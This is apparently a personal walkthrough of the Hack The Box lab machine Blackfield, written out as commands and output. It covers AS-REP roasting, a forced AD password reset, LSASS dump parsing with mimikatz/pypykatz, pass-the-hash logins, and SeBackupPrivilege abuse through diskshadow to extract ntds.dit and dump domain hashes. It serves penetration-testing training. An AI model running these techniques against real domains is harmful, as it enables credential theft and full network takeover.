Hackthebox Blackfield writeup
Summary
Anonymouslogin to the share profiles$- Creating a text file with the dirnames
- Generating a
TGTfor a valid user saving it in a file - Cracking the hash with John
- Login to the
rpcclient - Changing the audit2020 password to want i want.
Enumeratingthe share forensic- Got a zip file
lsass.zip, Unzipping it - Got a memory Dump file
lsass.DMP - DUmping NTLM hash from the file using mimikatz
- Login as
svc_backup - Got User.txt
- the user
svc_backupcan backup the files - using diskshadow to create a new volume with alias of
c: Copyingthe ntds.dit- Saving the registry file
SYSTEM - Cracking the
NTLMhash from the files using secretdump.py - Login as
administrator - Got root.txt
Pwned
$evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Recon
Nmap
# Nmap 7.93 scan initiated Thu Jan 23 13:46:39 2025 as: nmap -Pn -sC -sV -oN blackfield.nmap 10.10.10.192 Nmap scan report for 10.10.10.192 Host is up (0.016s latency). Not shown: 993 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-23 19:46:52Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name) Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 311: |_ Message signing enabled and required | smb2-time: | date: 2025-01-23T19:46:57 |_ start_date: N/A |_clock-skew: 6h59m58s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Jan 23 13:47:33 2025 -- 1 IP address (1 host up) scanned in 53.72 seconds
….the machine is about active-directory the ports that are opened are saying that ….
enum4linux
$ enum4linux blackfield.local Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jan 23 16:15:45 2025 =========================================( Target Information )========================================= Target ........... blackfield.local RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none --snip-- ==============================( Getting domain SID for blackfield.local )============================== Domain Name: BLACKFIELD Domain Sid: S-1-5-21-4194615774-2175524697-3563712290
.
Got the domain name BLACKFIELD from the enum4linux
or use
$ nxc smb 10.10.10.192 SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
Smbclient
tried to login anonymously , I enumerated for available shares and here is what i got.
$ impacket-smbclient ‘BLACKFIELD.local/a:@10.10.10.192’
$ smbmap -H 10.10.10.192 -u null
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.192:445 Name: dc01.blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
Okay…so basically we have almost 2 shares
forensicprofiles$
I tried to login myself to the share forensic
$ impacket-smbclient anonymous@@dc01.blackfield.local -dc-ip dc01.blackfield.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
#
.
But we are not allowed to enumerate this share …move on
┌──(puck㉿kali)-[~/htb/blackfield] └─$ sudo mount -t cifs -o username=anonymous,domain=blackfield.local //10.10.10.192/profiles$ /mnt/profiles Password for anonymous@//10.10.10.192/profiles$:
list users
┌──(puck㉿kali)-[/mnt/profiles] └─$ ls AAlleni BSamkoses ETurgano KAmavisca MHoerauf RNemnich TKauten ABarteski BZandonella EWojtila KAtolikian MKermarrec RPoretsky TKnupke ABekesz CAcherman FAlirezai KBrokinn MKillberg RStuehringer TLintlop ABenzies CAkbari FBaldwind KCockeril MLapesh RSzewczuga TMusselli ABiemiller CAldhowaihi FBroj KColtart MMakhsous RVallandas TOust --snip--
or
smbclient -N \\\\10.10.10.192\\profiles$ -c ls | awk '{ print $1 }' Let’s check which are valid users
└─$ ./kerbrute_linux_amd64 userenum -d blackfield.local --dc 10.10.10.192 validusers.txt -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/24/25 - Ronnie Flathers @ropnop
2025/01/24 09:52:25 > Using KDC(s):
2025/01/24 09:52:25 > 10.10.10.192:88
2025/01/24 09:52:30 > [+] VALID USERNAME: Administrator@blackfield.local
2025/01/24 09:52:30 > [+] VALID USERNAME: guest@blackfield.local
2025/01/24 09:52:30 > [+] VALID USERNAME: puck@blackfield.local
2025/01/24 09:52:30 > [+] VALID USERNAME: audit2020@blackfield.local
2025/01/24 09:52:30 > [+] VALID USERNAME: svc_backup@blackfield.local
2025/01/24 09:52:30 > [+] VALID USERNAME: support@blackfield.local
.
Using GetNPuser.py to get tgt
Now since we have users for the machine we can use GetNPuser from the impacket so we can generate a TGT for any valid user on the machine , I will generate the hash in john format so i can use john the ripper to crack the hash.
$ impacket-GetNPUsers BLACKFIELD.LOCAL/ -usersfile validusers.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.192 Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies $krb5asrep$support@BLACKFIELD.LOCAL:f22ffe8b7c0ef2412afab66aecca2f3a$207b3faccc9f46586d8e528205796d6d54a8f10125a615ce6c9377d83007a969428d0a66558660f0ce190af690fce8fa1f5c9888c9302e9d859f77ae09ccd3ba5132a65bac2d8126814161dfc629922792d63cc3dc0695d0e69052172b1a81d23b94596d5a016f56dc37d1a82179fecf7d71ea93e2d28d81c236f5fd636a39219717c70d939771a11f74b7af4b6f48a3be9640c3fe27d40f7a11d3952106d67890f737368ae13effa603d13982ef21f3a30b8d4fc96db20177576e159de1ce827b61daba794b4a8b7fd1162faebccd7e009789f64377695be5a65b2d1d3312f0e9c81db45ced9a868c6fc3ffdf4137f3297ab2f9
.
Time to crack it with john
$ john hashes.txt -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:06 74.10% (ETA: 16:31:25) 0g/s 1759Kp/s 1759Kc/s 1759KC/s Sarahmai..Samisbuff #00^BlackKnight ($krb5asrep$support@BLACKFIELD.LOCAL) 1g 0:00:00:08 DONE (2025-01-23 16:31) 0.1223g/s 1754Kp/s 1754Kc/s 1754KC/s #1WIF3Y.."chito" Use the "--show" option to display all of the cracked passwords reliably Session completed.
and we we cracked it gently….
The creds are valid for SMB, not for WINRM
$ nxc smb 10.10.10.192 -u support -p '#00^BlackKnight' SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
Bloodhound
$ bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192 --zip
We find here
The user SUPPORT@BLACKFIELD.LOCAL has the capability to change the user AUDIT2020@BLACKFIELD.LOCAL’s password without knowing that user’s current password.
Check the domain’s password policies
$ nxc smb 10.10.10.192 -u 'support' -p '#00^BlackKnight' --pass-pol SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight SMB 10.10.10.192 445 DC01 [+] Dumping password info for domain: BLACKFIELD SMB 10.10.10.192 445 DC01 Minimum password length: 7 SMB 10.10.10.192 445 DC01 Password history length: 24 SMB 10.10.10.192 445 DC01 Maximum password age: 41 days 23 hours 53 minutes SMB 10.10.10.192 445 DC01 SMB 10.10.10.192 445 DC01 Password Complexity Flags: 000001 SMB 10.10.10.192 445 DC01 Domain Refuse Password Change: 0 SMB 10.10.10.192 445 DC01 Domain Password Store Cleartext: 0 SMB 10.10.10.192 445 DC01 Domain Password Lockout Admins: 0 SMB 10.10.10.192 445 DC01 Domain Password No Clear Change: 0 SMB 10.10.10.192 445 DC01 Domain Password No Anon Change: 0 SMB 10.10.10.192 445 DC01 Domain Password Complex: 1 SMB 10.10.10.192 445 DC01 SMB 10.10.10.192 445 DC01 Minimum password age: 1 day 4 minutes SMB 10.10.10.192 445 DC01 Reset Account Lockout Counter: 30 minutes SMB 10.10.10.192 445 DC01 Locked Account Duration: 30 minutes SMB 10.10.10.192 445 DC01 Account Lockout Threshold: None SMB 10.10.10.192 445 DC01 Forced Log off Time: Not Set
Login into rpcclient
After enumerating here and there that where to use the credentials , I logged in myself to rpcclient
Enumerating users
└─$ rpcclient 10.10.10.192 -U support
Password for [WORKGROUP\support]:#00^BlackKnight
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
user:[BLACKFIELD538365] rid:[0x452]
--snip--
user:[BLACKFIELD653097] rid:[0x583]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
user:[puck] rid:[0x238d]
rpcclient $>
Getting info about current user
rpcclient $> queryuser support
User Name : support
Full Name :
Logon Time : Fri, 24 Jan 2025 00:35:40 CET
Logoff Time : Thu, 01 Jan 1970 01:00:00 CET
Kickoff Time : Thu, 01 Jan 1970 01:00:00 CET
Password last set Time : Sun, 23 Feb 2020 18:53:24 CET
Password can change Time : Mon, 24 Feb 2020 18:53:24 CET
Password must change Time: Thu, 14 Sep 30828 04:48:05 CEST
unknown_2[0..31]...
user_rid : 0x450
group_rid: 0x201
acb_info : 0x00010210
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x0000000d
padding1[0..7]...
logon_hrs[0..21]...
rpcclient $>
.
enumprivs
rpcclient $> enumprivs
found 35 privileges
SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
--snip--
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>
These are some available privs that the current user have ….From the few of the above privs i concluded that the user can change the other user’s password.
https://malicious.link/post/2017/reset-ad-user-password-with-linux/
I tried almost all the available users and i got succeed on the user audit2020 to change its password…
rpcclient $> setuserinfo2 audit2020 23 'Secret123!'
or use net rpc to change audit2020’s password
$ net rpc password 'audit2020' 'Secret123!' -U BLACKFIELD.local/'support'%'#00^BlackKnight' -S "BLACKFIELD.local"
Check creds
$ nxc smb 10.10.10.192 -u audit2020 -p 'Secret123!' SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False) SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Secret123!
checked ldap, only found one interesting thing
The password policy has a lockoutThreshold of 0, which means we can attempt an unlimited
number of passwords without locking the account out (although this is quite noisy).
$ ldapsearch -H ldap://10.10.10.192 -b "DC=BLACKFIELD,DC=local" -D 'support@blackfield.local' -w '#00^BlackKnight' > support_ldap_dump
And now i can login myself to the smbclient to enumerate the share forensic….
└─$ smbclient -U audit2020 //10.10.10.192/forensic 'Secret123!'
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 14:39:08 2020
5102079 blocks of size 4096. 1690605 blocks available
smb: \>
Well…the user audit2020 has permissions to read the share
Got the file lsass.zip
LSASS is short for Local Security Authority Subsystem Service, and it stores credentials in memory on behalf of a user that has an active (or recently active) session. This allows the user to access network resources
without re-typing their credentials for each service. LSASS may store credentials in multiple forms, including reversibly encrypted password, Kerberos tickets, NT hash, LM hash, DPAPI
Credentials are stored in LSASS for sessions that have been established since the last reboot and have not been closed.
see also : https://en.hackndo.com/remote-lsass-dump-passwords/
After some manual enum i got a .zip file called lsass.zip from the dir memory_analysis , its was hard to find this file amongst so many files
smb: \memory_analysis\> get lsass.zip getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (3359.9 KiloBytes/sec) (average 3359.9 KiloBytes/sec) smb: \memory_analysis\>
..
unzip the file
┌──(puck㉿kali)-[~/htb/blackfield] └─$ unzip lsass.zip Archive: lsass.zip inflating: lsass.DMP
.
Well .DMP file is a memory dump file which been created when the program crahses or something went wrong….
It can be sometime useful to dump useful information from it , Thats why mimikatz has a feature to dump useful information from it like , NTLM hash
i copied the .DMP file to my windows machine and Download mimikatz in it
Disable the
virus-protectionfrom windows to download mimikatz
https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf
Load your mimikatz.exe
sekurlsa::minidump /users/0xPrashant/Desktop/lsass.DMP
sekurlsa::LogonPasswords
And done !! i got basically two users hash
svc_backupadministrator
.
.Or we use pypykatz
┌──(puck㉿kali)-[~/htb/blackfield]
└─$ pypykatz lsa minidump lsass.DMP > hashes.txt
INFO:pypykatz:Parsing file lsass.DMP
┌──(puck㉿kali)-[~/htb/blackfield]
└─$ cat hashes.txt| more
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
┌──(puck㉿kali)-[~/htb/blackfield]
.
There is a administrator NTLM hash but i dont think this will evil-winrm that easy
As expected it didnt work….move on
Login as svc_backup
└─$ nxc winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d WINRM 10.10.10.192 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local) WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
I tried the second NTLM hash that is of svc_backup user
.
$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
Privilege escalation to root
Root is as simple as i didn’t even think….
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all USER INFORMATION ---------------- User Name SID ===================== ============================================== blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled USER CLAIMS INFORMATION ----------------------- User claims unknown. Kerberos support for Dynamic Access Control on this device has been disabled. *Evil-WinRM* PS C:\Users\svc_backup\Documents>
.
As from the output these are some interesting ones which suits to the username svc_backup….
1 |
SeBackupPrivilege Back up files and directories Enabled |
The user svc_backup can backup the data since it has SeBackupPrivilege
it took me some time actually that what to do but some google searches save my time….
Since it is a AD machine and i have perms to backup anyting from the machine , So i am going to backup the NTDS.dit file and the registry file system
The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
Here is a good explation from a pdf file that how it is going to work !!
i need to use diskshadow to first make a new volume and alias it with the volume C: so i can read everything from the volume c:
here i made a text file basically a script that will execute commands on the Diskshadow console
1 2 3 4 |
SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias 0xprashant
create
expose %0xprashant% z:
|
Uploading the script
1 2 3 4 5 6 7 |
*Evil-WinRM* PS C:\temp> upload /home/prashant/0xprashant.txt Info: Uploading /home/prashant/0xprashant.txt to C:\temp\0xprashant.txt Data: 124 bytes of 124 bytes copied Info: Upload successful! |
Executing the script
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
*Evil-WinRM* PS C:\temp> diskshadow /s 0xprashant.txt Microsoft DiskShadow version 1.0 Copyright (C) 2013 Microsoft Corporation On computer: DC01, 6/10/2020 3:34:37 PM -> SET CONTEXT PERSISTENT NOWRITER SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] } CLIENTACCESSIBLE Specify to create shadow copies usable by client versions of Windows. PERSISTENT Specify that shadow copy is persist across program exit, reset or reboot. PERSISTENT NOWRITERS Specify that shadow copy is persistent and all writers are excluded. VOLATILE Specify that shadow copy will be deleted on exit or reset. VOLATILE NOWRITERS Specify that shadow copy is volatile and all writers are excluded. Example: SET CONTEXT CLIENTACCESSIBLE |
Got an error of like this…..If i look at the error it is complaing about the -> SET CONTEXT PERSISTENT NOWRITER but in my script it is NOWRITERS not NOWRITER .
Then i figured it out that the last character from the line is being deleted and then its used
I added an extra dummy character at the last of every line
1 2 3 4 5 |
➜ prashant cat 0xprashant.txt SET CONTEXT PERSISTENT NOWRITERSp add volume c: alias 0xprashantp createp expose %0xprashant% z:p |
like this……………!!!!!!
Running again
.
*Evil-WinRM* PS C:\programdata> diskshadow /s puckiestyle.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 1/29/2025 9:38:06 AM
-> SET CONTEXT PERSISTENT NOWRITERS
-> add volume c: alias 0xprashant
-> create
Alias 0xprashant for shadow ID {9adb5c52-03c2-4ca2-982b-e87b321da66d} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {bd61294e-acda-471e-aeb6-d70f4fce991b} set as environment variable.
Querying all shadow copies with the shadow copy set ID {bd61294e-acda-471e-aeb6-d70f4fce991b}
* Shadow copy ID = {9adb5c52-03c2-4ca2-982b-e87b321da66d} %0xprashant%
- Shadow copy set: {bd61294e-acda-471e-aeb6-d70f4fce991b} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 1/29/2025 9:38:08 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %0xprashant% z:
-> %0xprashant% = {9adb5c52-03c2-4ca2-982b-e87b321da66d}
The shadow copy was successfully exposed as z:\.
*Evil-WinRM* PS C:\programdata>
This time it ran smoothly….
Now its ime to copy the NTDS.dit file , There is a tool on github that will do this thing for me….
https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
Upload the two dll files to the machine and then simply import them
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeCmdLets.dll
Info: Uploading /home/puck/htb/blackfield/SeBackupPrivilegeCmdLets.dll to C:\programdata\SeBackupPrivilegeCmdLets.dll
Data: 16384 bytes of 16384 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> upload SeBackupPrivilegeUtils.dll
Info: Uploading /home/puck/htb/blackfield/SeBackupPrivilegeUtils.dll to C:\programdata\SeBackupPrivilegeUtils.dll
Data: 21844 bytes of 21844 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\programdata> Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\programdata\ndts.dit
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 2/1/2020 11:04 AM Microsoft
d----- 3/19/2020 11:08 AM Package Cache
d----- 1/29/2025 9:38 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 2/23/2020 6:32 AM ssh
d----- 2/1/2020 10:57 AM USOPrivate
d----- 2/1/2020 10:57 AM USOShared
d----- 3/19/2020 11:09 AM VMware
-a---- 1/29/2025 9:34 AM 95 0xprashant.txt
-a---- 1/29/2025 9:38 AM 634 2025-01-29_9-38-08_DC01.cab
-a---- 1/29/2025 9:44 AM 18874368 ndts.dit
-a---- 1/29/2025 9:37 AM 99 puckiestyle.txt
-a---- 1/29/2025 9:43 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 1/29/2025 9:43 AM 16384 SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\programdata>
.
And we got it …..now its time for the system file
*Evil-WinRM* PS C:\programdata> download system Info: Downloading C:\programdata\system to system Info: Download successful! *Evil-WinRM* PS C:\programdata> download ndts.dit Info: Downloading C:\programdata\ndts.dit to ndts.dit Info: Download successful! *Evil-WinRM* PS C:\programdata>
.
Dumping NTLM from ntds.dit and system
Now i have both the files …. i can use secretdump.py to dump the ntlm hash from them
$ impacket-secretsdump -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DC01$:1000:aad3b435b51404eeaad3b435b51404ee:6c7ffdd2736cc96ef870d1b94760b5e6::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d::: audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa::: support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212::: BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c::: --snip--
.
And here we got the NTLM hash for the user administrator
Login as administrator
└─$ evil-winrm -i 10.10.10.192 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And we pwned it …….
procdump
*Evil-WinRM* PS C:\temp> upload procdump.exe
Info: Uploading /home/puck/htb/blackfield/procdump.exe to C:\temp\procdump.exe
Data: 1055944 bytes of 1055944 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> upload Eula.txt
Info: Uploading /home/puck/htb/blackfield/Eula.txt to C:\temp\Eula.txt
Data: 9984 bytes of 9984 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\temp> .\procdump.exe -accepteula -ma lsass C:\\Temp\\lsass.dmp
ProcDump v11.0 - Sysinternals process dump utility
Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[14:47:00] Dump 1 initiated: C:\Temp\lsass.dmp
[14:47:01] Dump 1 writing: Estimated dump file size is 155 MB.
[14:47:05] Dump 1 complete: 155 MB written in 4.7 seconds
[14:47:05] Waiting for dump to complete...
[14:47:05] Dump count reached.
*Evil-WinRM* PS C:\temp> ls
Directory: C:\temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2025 2:46 PM 7490 Eula.txt
-a---- 1/29/2025 2:47 PM 158123094 lsass.dmp
-a---- 1/29/2025 2:45 PM 791960 procdump.exe
*Evil-WinRM* PS C:\temp>
.
Resources
This post is for fun.